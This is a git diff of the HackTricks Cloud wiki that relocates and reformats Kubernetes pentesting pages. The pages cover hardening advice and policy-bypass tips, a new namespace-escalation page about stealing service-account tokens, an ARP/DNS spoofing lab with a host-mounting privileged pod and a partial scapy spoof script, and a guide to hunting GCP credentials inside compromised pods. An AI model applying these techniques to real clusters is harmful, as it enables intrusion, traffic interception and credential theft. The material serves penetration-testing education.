+- NodeRestriction; No access from specific nodes to the API.
+ - [https://kubernetes.io/docs/reference/access-authn-authz/admission-controllers/#noderestriction](https://kubernetes.io/docs/reference/access-authn-authz/admission-controllers/#noderestriction)
+ - Basically prevents kubelets from adding/removing/updating labels with a node-restriction.kubernetes.io/ prefix. This label prefix is reserved for administrators to label their Node objects for workload isolation purposes, and kubelets will not be allowed to modify labels with that prefix.
+ - And also, allows kubelets to add/remove/update these labels and label prefixes.
+- Ensure with labels the secure workload isolation.
+- Avoid specific pods from API access.
+- Avoid ApiServer exposure to the internet.
+- Avoid unauthorized access RBAC.
+- ApiServer port with firewall and IP whitelisting.
### SecurityContext Hardening
@@ -162,39 +149,26 @@ spec: allowPrivilegeEscalation: true ``` -* [https://kubernetes.io/docs/tasks/configure-pod-container/security-context/](https://kubernetes.io/docs/tasks/configure-pod-container/security-context/) -* [https://kubernetes.io/docs/concepts/policy/pod-security-policy/](https://kubernetes.io/docs/concepts/policy/pod-security-policy/) +- [https://kubernetes.io/docs/tasks/configure-pod-container/security-context/](https://kubernetes.io/docs/tasks/configure-pod-container/security-context/) +- [https://kubernetes.io/docs/concepts/policy/pod-security-policy/](https://kubernetes.io/docs/concepts/policy/pod-security-policy/) ### General Hardening You should update your Kubernetes environment as frequently as necessary to have: -* Dependencies up to date. -* Bug and security patches. +- Dependencies up to date. +- Bug and security patches. [**Release cycles**](https://kubernetes.io/docs/setup/release/version-skew-policy/): Each 3 months there is a new minor release -- 1.20.3 = 1(Major).20(Minor).3(patch) **The best way to update a Kubernetes Cluster is (from** [**here**](https://kubernetes.io/docs/tasks/administer-cluster/cluster-upgrade/)**):** -* Upgrade the Master Node components following this sequence: - * etcd (all instances). - * kube-apiserver (all control plane hosts). - * kube-controller-manager. - * kube-scheduler. - * cloud controller manager, if you use one. -* Upgrade the Worker Node components such as kube-proxy, kubelet. +- Upgrade the Master Node components following this sequence: + - etcd (all instances). + - kube-apiserver (all control plane hosts). + - kube-controller-manager. + - kube-scheduler. + - cloud controller manager, if you use one. +- Upgrade the Worker Node components such as kube-proxy, kubelet. 
-{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/kubernetes-security/kubernetes-hardening/kubernetes-securitycontext-s.md b/src/pentesting-cloud/kubernetes-security/kubernetes-hardening/kubernetes-securitycontext-s.md similarity index 83% rename from pentesting-cloud/kubernetes-security/kubernetes-hardening/kubernetes-securitycontext-s.md rename to src/pentesting-cloud/kubernetes-security/kubernetes-hardening/kubernetes-securitycontext-s.md index 12734b41b..f9083020d 100644 --- a/pentesting-cloud/kubernetes-security/kubernetes-hardening/kubernetes-securitycontext-s.md +++ b/src/pentesting-cloud/kubernetes-security/kubernetes-hardening/kubernetes-securitycontext-s.md @@ -1,19 +1,6 @@ # Kubernetes SecurityContext(s) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## PodSecurityContext @@ -21,10 +8,10 @@ Learn & practice GCP Hacking: fsGroup
integer

|

A special supplemental group that applies to all containers in a pod. Some volume types allow the Kubelet to change the ownership of that volume to be owned by the pod:
1. The owning GID will be the FSGroup
2. The setgid bit is set (new files created in the volume will be owned by FSGroup)
3. The permission bits are OR'd with rw-rw---- If unset, the Kubelet will not modify the ownership and permissions of any volume

| | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | 
@@ -44,45 +31,32 @@ When specifying the security context of a Pod you can use several attributes. Fr This context is set inside the **containers definitions**. From a defensive security point of view you should consider: -* **allowPrivilegeEscalation** to **False** -* Do not add sensitive **capabilities** (and remove the ones you don't need) -* **privileged** to **False** -* If possible, set **readOnlyFilesystem** as **True** -* Set **runAsNonRoot** to **True** and set a **runAsUser** -* If possible, consider **limiting** **permissions** indicating **seLinuxOptions** and **seccompProfile** -* Do **NOT** give **privilege** **group** access via **runAsGroup.** +- **allowPrivilegeEscalation** to **False** +- Do not add sensitive **capabilities** (and remove the ones you don't need) +- **privileged** to **False** +- If possible, set **readOnlyFilesystem** as **True** +- Set **runAsNonRoot** to **True** and set a **runAsUser** +- If possible, consider **limiting** **permissions** indicating **seLinuxOptions** and **seccompProfile** +- Do **NOT** give **privilege** **group** access via **runAsGroup.** Note that the attributes set in **both SecurityContext and PodSecurityContext**, the value specified in **SecurityContext** takes **precedence**. -|

allowPrivilegeEscalation
boolean

| **AllowPrivilegeEscalation** controls whether a process can **gain more privileges** than its parent process. This bool directly controls if the no\_new\_privs flag will be set on the container process. AllowPrivilegeEscalation is true always when the container is run as **Privileged** or has **CAP\_SYS\_ADMIN** | -| ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | -|

capabilities
Capabilities
More info about Capabilities

| The **capabilities to add/drop when running containers**. Defaults to the default set of capabilities. | -|

privileged
boolean

| Run container in privileged mode. Processes in privileged containers are essentially **equivalent to root on the host**. Defaults to false. | -|

procMount
string

| procMount denotes the **type of proc mount to use for the containers**. The default is DefaultProcMount which uses the container runtime defaults for readonly paths and masked paths. | -|

readOnlyRootFilesystem
boolean

| Whether this **container has a read-only root filesystem**. Default is false. | -|

runAsGroup
integer

| The **GID to run the entrypoint** of the container process. Uses runtime default if unset. | -|

runAsNonRoot
boolean

| Indicates that the container must **run as a non-root user**. If true, the Kubelet will validate the image at runtime to ensure that it does not run as UID 0 (root) and fail to start the container if it does. | -|

runAsUser
integer

| The **UID to run the entrypoint** of the container process. Defaults to user specified in image metadata if unspecified. | -|

seLinuxOptions
SELinuxOptions
More info about seLinux

| The **SELinux context to be applied to the container**. If unspecified, the container runtime will allocate a random SELinux context for each container. | -|

seccompProfile
SeccompProfile

| The **seccomp options** to use by this container. | -|

windowsOptions
WindowsSecurityContextOptions

| The **Windows specific settings** applied to all containers. | +|

allowPrivilegeEscalation
boolean

| **AllowPrivilegeEscalation** controls whether a process can **gain more privileges** than its parent process. This bool directly controls if the no_new_privs flag will be set on the container process. AllowPrivilegeEscalation is true always when the container is run as **Privileged** or has **CAP_SYS_ADMIN** | +| ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | +|

capabilities
Capabilities
More info about Capabilities

| The **capabilities to add/drop when running containers**. Defaults to the default set of capabilities. | +|

privileged
boolean

| Run container in privileged mode. Processes in privileged containers are essentially **equivalent to root on the host**. Defaults to false. | +|

procMount
string

| procMount denotes the **type of proc mount to use for the containers**. The default is DefaultProcMount which uses the container runtime defaults for readonly paths and masked paths. | +|

readOnlyRootFilesystem
boolean

| Whether this **container has a read-only root filesystem**. Default is false. | +|

runAsGroup
integer

| The **GID to run the entrypoint** of the container process. Uses runtime default if unset. | +|

runAsNonRoot
boolean

| Indicates that the container must **run as a non-root user**. If true, the Kubelet will validate the image at runtime to ensure that it does not run as UID 0 (root) and fail to start the container if it does. | +|

runAsUser
integer

| The **UID to run the entrypoint** of the container process. Defaults to user specified in image metadata if unspecified. | +|

seLinuxOptions
SELinuxOptions
More info about seLinux

| The **SELinux context to be applied to the container**. If unspecified, the container runtime will allocate a random SELinux context for each container. | +|

seccompProfile
SeccompProfile

| The **seccomp options** to use by this container. | +|

windowsOptions
WindowsSecurityContextOptions

| The **Windows specific settings** applied to all containers. | ## References -* [https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.23/#podsecuritycontext-v1-core](https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.23/#podsecuritycontext-v1-core) -* [https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.23/#securitycontext-v1-core](https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.23/#securitycontext-v1-core) +- [https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.23/#podsecuritycontext-v1-core](https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.23/#podsecuritycontext-v1-core) +- [https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.23/#securitycontext-v1-core](https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.23/#securitycontext-v1-core) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/kubernetes-security/kubernetes-kyverno/README.md b/src/pentesting-cloud/kubernetes-security/kubernetes-kyverno/README.md similarity index 100% rename from pentesting-cloud/kubernetes-security/kubernetes-kyverno/README.md rename to src/pentesting-cloud/kubernetes-security/kubernetes-kyverno/README.md diff --git a/pentesting-cloud/kubernetes-security/kubernetes-kyverno/kubernetes-kyverno-bypass.md b/src/pentesting-cloud/kubernetes-security/kubernetes-kyverno/kubernetes-kyverno-bypass.md similarity index 78% rename from pentesting-cloud/kubernetes-security/kubernetes-kyverno/kubernetes-kyverno-bypass.md rename to src/pentesting-cloud/kubernetes-security/kubernetes-kyverno/kubernetes-kyverno-bypass.md index ef10afd6d..635343b6c 100644 --- a/pentesting-cloud/kubernetes-security/kubernetes-kyverno/kubernetes-kyverno-bypass.md +++ b/src/pentesting-cloud/kubernetes-security/kubernetes-kyverno/kubernetes-kyverno-bypass.md @@ -17,11 +17,11 @@ $ kubectl get policies For each ClusterPolicy and Policy, you can specify a list of excluded entities, including: -* Groups: `excludedGroups` -* Users: `excludedUsers` -* Service Accounts (SA): `excludedServiceAccounts` -* Roles: `excludedRoles` -* Cluster Roles: `excludedClusterRoles` +- Groups: `excludedGroups` +- Users: `excludedUsers` +- Service Accounts (SA): `excludedServiceAccounts` +- Roles: `excludedRoles` +- Cluster Roles: `excludedClusterRoles` These excluded entities will be exempt from the policy requirements, and Kyverno will not enforce the policy for them. 
@@ -37,17 +37,16 @@ Look for the excluded entities : ```yaml exclude: - any: - - clusterRoles: + any: + - clusterRoles: - cluster-admin - - subjects: + - subjects: - kind: User name: system:serviceaccount:DUMMYNAMESPACE:admin - kind: User name: system:serviceaccount:TEST:thisisatest - kind: User name: system:serviceaccount:AHAH:* - ``` Within a cluster, numerous added components, operators, and applications may necessitate exclusion from a cluster policy. However, this can be exploited by targeting privileged entities. In some cases, it may appear that a namespace does not exist or that you lack permission to impersonate a user, which can be a sign of misconfiguration. @@ -56,7 +55,6 @@ Within a cluster, numerous added components, operators, and applications may nec Another way to bypass policies is to focus on the ValidatingWebhookConfiguration resource : -{% content-ref url="../kubernetes-validatingwebhookconfiguration.md" %} -[kubernetes-validatingwebhookconfiguration.md](../kubernetes-validatingwebhookconfiguration.md) -{% endcontent-ref %} - +{{#ref}} +../kubernetes-validatingwebhookconfiguration.md +{{#endref}} diff --git a/src/pentesting-cloud/kubernetes-security/kubernetes-namespace-escalation.md b/src/pentesting-cloud/kubernetes-security/kubernetes-namespace-escalation.md new file mode 100644 index 000000000..b0ddbb10b --- /dev/null +++ b/src/pentesting-cloud/kubernetes-security/kubernetes-namespace-escalation.md 
@@ -0,0 +1,33 @@
+# Kubernetes Namespace Escalation
+
+{{#include ../../banners/hacktricks-training.md}}
+
+In Kubernetes it's pretty common that somehow **you manage to get inside a namespace** (by stealing some user credentials or by compromising a pod). However, usually you will be interested in **escalating to a different namespace as more interesting things can be found there**.
+
+Here are some techniques you can try to escape to a different namespace:
+
+### Abuse K8s privileges
+
+Obviously if the account you have stolen have sensitive privileges over the namespace you can to escalate to, you can abuse actions like **creating pods** with service accounts in the NS, **executing** a shell in an already existent pod inside of the ns, or read the **secret** SA tokens.
+
+For more info about which privileges you can abuse read:
+
+{{#ref}}
+abusing-roles-clusterroles-in-kubernetes/
+{{#endref}}
+
+### Escape to the node
+
+If you can escape to the node either because you have compromised a pod and you can escape or because you ca create a privileged pod and escape you could do several things to steal other SAs tokens:
+
+- Check for **SAs tokens mounted in other docker containers** running in the node
+- Check for new **kubeconfig files in the node with extra permissions** given to the node
+- If enabled (or enable it yourself) try to **create mirrored pods of other namespaces** as you might get access to those namespaces default token accounts (I haven't tested this yet)
+
+All these techniques are explained in:
+
+{{#ref}}
+attacking-kubernetes-from-inside-a-pod.md
+{{#endref}}
+
+{{#include ../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/kubernetes-security/kubernetes-network-attacks.md b/src/pentesting-cloud/kubernetes-security/kubernetes-network-attacks.md similarity index 61% rename from pentesting-cloud/kubernetes-security/kubernetes-network-attacks.md rename to src/pentesting-cloud/kubernetes-security/kubernetes-network-attacks.md index 51aeb99e3..cf2940aa7 100644 --- a/pentesting-cloud/kubernetes-security/kubernetes-network-attacks.md +++ b/src/pentesting-cloud/kubernetes-security/kubernetes-network-attacks.md @@ -1,19 +1,6 @@ # Kubernetes Network Attacks -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../banners/hacktricks-training.md}} ## Introduction @@ -23,10 +10,10 @@ ARP spoofing attacks involve the **attacker sending falsified ARP** (Address Res In the scenario 4 machines are going to be created: -* ubuntu-pe: Privileged machine to escape to the node and check metrics (not needed for the attack) -* **ubuntu-attack**: **Malicious** container in default namespace -* **ubuntu-victim**: **Victim** machine in kube-system namespace -* **mysql**: **Victim** machine in default namespace +- ubuntu-pe: Privileged machine to escape to the node and check metrics (not needed for the attack) +- **ubuntu-attack**: **Malicious** container in default namespace +- **ubuntu-victim**: **Victim** machine in kube-system namespace +- **mysql**: **Victim** machine in default namespace ```yaml echo 'apiVersion: v1 @@ -35,27 +22,27 @@ metadata: name: ubuntu-pe spec: containers: - - image: ubuntu - command: - - "sleep" - - "360000" - imagePullPolicy: IfNotPresent - name: ubuntu-pe - securityContext: - allowPrivilegeEscalation: true - privileged: true - runAsUser: 0 - volumeMounts: - - mountPath: /host - name: host-volume - restartPolicy: Never - hostIPC: true - hostNetwork: true - hostPID: true + - image: ubuntu + command: + - "sleep" + - "360000" + imagePullPolicy: IfNotPresent + name: ubuntu-pe + securityContext: + allowPrivilegeEscalation: true + privileged: true + runAsUser: 0 + volumeMounts: + - mountPath: /host + name: host-volume + restartPolicy: Never + hostIPC: true + hostNetwork: true + hostPID: true volumes: - - name: host-volume - hostPath: - path: / + - name: host-volume + hostPath: + path: / --- apiVersion: v1 kind: Pod @@ -65,12 +52,12 @@ metadata: app: ubuntu spec: containers: - - image: ubuntu - command: - - "sleep" - - "360000" - imagePullPolicy: IfNotPresent - name: ubuntu-attack + - image: ubuntu + command: + - "sleep" + - "360000" + imagePullPolicy: IfNotPresent + name: ubuntu-attack restartPolicy: Never --- apiVersion: v1 
@@ -80,12 +67,12 @@ metadata: namespace: kube-system spec: containers: - - image: ubuntu - command: - - "sleep" - - "360000" - imagePullPolicy: IfNotPresent - name: ubuntu-victim + - image: ubuntu + command: + - "sleep" + - "360000" + imagePullPolicy: IfNotPresent + name: ubuntu-victim restartPolicy: Never --- apiVersion: v1 @@ -94,14 +81,14 @@ metadata: name: mysql spec: containers: - - image: mysql:5.6 - ports: - - containerPort: 3306 - imagePullPolicy: IfNotPresent - name: mysql - env: - - name: MYSQL_ROOT_PASSWORD - value: mysql + - image: mysql:5.6 + ports: + - containerPort: 3306 + imagePullPolicy: IfNotPresent + name: mysql + env: + - name: MYSQL_ROOT_PASSWORD + value: mysql restartPolicy: Never' | kubectl apply -f - ``` @@ -121,9 +108,8 @@ Generally speaking, **pod-to-pod networking inside the node** is available via a This fact implies that, by default, **every pod running in the same node** is going to be able to **communicate** with any other pod in the same node (independently of the namespace) at ethernet level (layer 2). -{% hint style="warning" %} -Therefore, it's possible to perform A**RP Spoofing attacks between pods in the same node.** -{% endhint %} +> [!WARNING] +> Therefore, it's possible to perform A**RP Spoofing attacks between pods in the same node.** ### DNS 
@@ -167,13 +153,12 @@ However, the pod **doesn't know** how to get to that **address** because the **p Therefore, the pod will send the **DNS requests to the address 10.96.0.10** which will be **translated** by the cbr0 **to** **172.17.0.2**. -{% hint style="warning" %} -This means that a **DNS request** of a pod is **always** going to go the **bridge** to **translate** the **service IP to the endpoint IP**, even if the DNS server is in the same subnetwork as the pod. - -Knowing this, and knowing **ARP attacks are possible**, a **pod** in a node is going to be able to **intercept the traffic** between **each pod** in the **subnetwork** and the **bridge** and **modify** the **DNS responses** from the DNS server (**DNS Spoofing**). - -Moreover, if the **DNS server** is in the **same node as the attacker**, the attacker can **intercept all the DNS request** of any pod in the cluster (between the DNS server and the bridge) and modify the responses. -{% endhint %} +> [!WARNING] +> This means that a **DNS request** of a pod is **always** going to go the **bridge** to **translate** the **service IP to the endpoint IP**, even if the DNS server is in the same subnetwork as the pod. +> +> Knowing this, and knowing **ARP attacks are possible**, a **pod** in a node is going to be able to **intercept the traffic** between **each pod** in the **subnetwork** and the **bridge** and **modify** the **DNS responses** from the DNS server (**DNS Spoofing**). +> +> Moreover, if the **DNS server** is in the **same node as the attacker**, the attacker can **intercept all the DNS request** of any pod in the cluster (between the DNS server and the bridge) and modify the responses. ## ARP Spoofing in pods in the same Node @@ -197,8 +182,7 @@ ngrep -d eth0 # interacting with the mysql instance ``` -{% code title="arp_spoof.py" %} -```python +```python:arp_spoof.py #From https://gist.github.com/rbn15/bc054f9a84489dbdfc35d333e3d63c87#file-arpspoofer-py from scapy.all import * 
@@ -249,7 +233,6 @@ if __name__=="__main__": # To enable IP forwarding: echo 1 > /proc/sys/net/ipv4/ip_forward ``` -{% endcode %} ### ARPSpoof @@ -290,10 +273,9 @@ dig google.com google.com. 1 IN A 1.1.1.1 ``` -{% hint style="info" %} -If you try to create your own DNS spoofing script, if you **just modify the the DNS response** that is **not** going to **work**, because the **response** is going to have a **src IP** the IP address of the **malicious** **pod** and **won't** be **accepted**.\ -You need to generate a **new DNS packet** with the **src IP** of the **DNS** where the victim send the DNS request (which is something like 172.16.0.2, not 10.96.0.10, thats the K8s DNS service IP and not the DNS server ip, more about this in the introduction). -{% endhint %} +> [!NOTE] +> If you try to create your own DNS spoofing script, if you **just modify the the DNS response** that is **not** going to **work**, because the **response** is going to have a **src IP** the IP address of the **malicious** **pod** and **won't** be **accepted**.\ +> You need to generate a **new DNS packet** with the **src IP** of the **DNS** where the victim send the DNS request (which is something like 172.16.0.2, not 10.96.0.10, thats the K8s DNS service IP and not the DNS server ip, more about this in the introduction). ## Capturing Traffic 
@@ -302,20 +284,7 @@ It will install agents in the selected pods and gather their traffic information ## References -* [https://www.cyberark.com/resources/threat-research-blog/attacking-kubernetes-clusters-through-your-network-plumbing-part-1](https://www.cyberark.com/resources/threat-research-blog/attacking-kubernetes-clusters-through-your-network-plumbing-part-1) -* [https://blog.aquasec.com/dns-spoofing-kubernetes-clusters](https://blog.aquasec.com/dns-spoofing-kubernetes-clusters) +- [https://www.cyberark.com/resources/threat-research-blog/attacking-kubernetes-clusters-through-your-network-plumbing-part-1](https://www.cyberark.com/resources/threat-research-blog/attacking-kubernetes-clusters-through-your-network-plumbing-part-1) +- [https://blog.aquasec.com/dns-spoofing-kubernetes-clusters](https://blog.aquasec.com/dns-spoofing-kubernetes-clusters) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/README.md b/src/pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/README.md similarity index 100% rename from pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/README.md rename to src/pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/README.md diff --git a/pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/kubernetes-opa-gatekeeper-bypass.md b/src/pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/kubernetes-opa-gatekeeper-bypass.md similarity index 79% rename from pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/kubernetes-opa-gatekeeper-bypass.md rename to src/pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/kubernetes-opa-gatekeeper-bypass.md index cea42a07d..96cf3b0e3 100644 --- a/pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/kubernetes-opa-gatekeeper-bypass.md +++ b/src/pentesting-cloud/kubernetes-security/kubernetes-opa-gatekeeper/kubernetes-opa-gatekeeper-bypass.md @@ -28,7 +28,7 @@ $ kubectl get k8smandatorylabels A Graphic User Interface may also be available to access the OPA rules with **Gatekeeper Policy Manager.** It is "a simple _read-only_ web UI for viewing OPA Gatekeeper policies' status in a Kubernetes Cluster." -
+
Search for the exposed service : @@ -45,19 +45,19 @@ As illustrated in the image above, certain rules may not be applied universally With a comprehensive overview of the Gatekeeper configuration, it's possible to identify potential misconfigurations that could be exploited to gain privileges. Look for whitelisted or excluded namespaces where the rule doesn't apply, and then carry out your attack there. -{% content-ref url="../abusing-roles-clusterroles-in-kubernetes/" %} -[abusing-roles-clusterroles-in-kubernetes](../abusing-roles-clusterroles-in-kubernetes/) -{% endcontent-ref %} +{{#ref}} +../abusing-roles-clusterroles-in-kubernetes/ +{{#endref}} ## Abusing ValidatingWebhookConfiguration Another way to bypass constraints is to focus on the ValidatingWebhookConfiguration resource : -{% content-ref url="../kubernetes-validatingwebhookconfiguration.md" %} -[kubernetes-validatingwebhookconfiguration.md](../kubernetes-validatingwebhookconfiguration.md) -{% endcontent-ref %} +{{#ref}} +../kubernetes-validatingwebhookconfiguration.md +{{#endref}} ## References -* [https://github.com/open-policy-agent/gatekeeper](https://github.com/open-policy-agent/gatekeeper) -* [https://github.com/sighupio/gatekeeper-policy-manager](https://github.com/sighupio/gatekeeper-policy-manager) +- [https://github.com/open-policy-agent/gatekeeper](https://github.com/open-policy-agent/gatekeeper) +- [https://github.com/sighupio/gatekeeper-policy-manager](https://github.com/sighupio/gatekeeper-policy-manager) diff --git a/pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.md b/src/pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.md similarity index 64% rename from pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.md rename to src/pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.md index e9de02721..b5958557f 100644 --- a/pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.md 
+++ b/src/pentesting-cloud/kubernetes-security/kubernetes-pivoting-to-clouds.md @@ -1,19 +1,6 @@ # Kubernetes Pivoting to Clouds -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../banners/hacktricks-training.md}} ## GCP 
@@ -23,27 +10,26 @@ If you are running a k8s cluster inside GCP you will probably want that some app A common way to give **access to a kubernetes application to GCP** is to: -* Create a GCP Service Account -* Bind on it the desired permissions -* Download a json key of the created SA -* Mount it as a secret inside the pod -* Set the GOOGLE\_APPLICATION\_CREDENTIALS environment variable pointing to the path where the json is. +- Create a GCP Service Account +- Bind on it the desired permissions +- Download a json key of the created SA +- Mount it as a secret inside the pod +- Set the GOOGLE_APPLICATION_CREDENTIALS environment variable pointing to the path where the json is. -{% hint style="warning" %} -Therefore, as an **attacker**, if you compromise a container inside a pod, you should check for that **env** **variable** and **json** **files** with GCP credentials. -{% endhint %} +> [!WARNING] +> Therefore, as an **attacker**, if you compromise a container inside a pod, you should check for that **env** **variable** and **json** **files** with GCP credentials. ### Relating GSA json to KSA secret A way to give access to a GSA to a GKE cluser is by binding them in this way: -* Create a Kubernetes service account in the same namespace as your GKE cluster using the following command: +- Create a Kubernetes service account in the same namespace as your GKE cluster using the following command: ```bash Copy codekubectl create serviceaccount ``` -* Create a Kubernetes Secret that contains the credentials of the GCP service account you want to grant access to the GKE cluster. You can do this using the `gcloud` command-line tool, as shown in the following example: +- Create a Kubernetes Secret that contains the credentials of the GCP service account you want to grant access to the GKE cluster. You can do this using the `gcloud` command-line tool, as shown in the following example: ```bash Copy codegcloud iam service-accounts keys create .json \ 
@@ -52,16 +38,15 @@ kubectl create secret generic \ --from-file=key.json=.json ``` -* Bind the Kubernetes Secret to the Kubernetes service account using the following command: +- Bind the Kubernetes Secret to the Kubernetes service account using the following command: ```bash Copy codekubectl annotate serviceaccount \ iam.gke.io/gcp-service-account= ``` -{% hint style="warning" %} -In the **second step** it was set the **credentials of the GSA as secret of the KSA**. Then, if you can **read that secret** from **inside** the **GKE** cluster, you can **escalate to that GCP service account**. -{% endhint %} +> [!WARNING] +> In the **second step** it was set the **credentials of the GSA as secret of the KSA**. Then, if you can **read that secret** from **inside** the **GKE** cluster, you can **escalate to that GCP service account**. ### GKE Workload Identity 
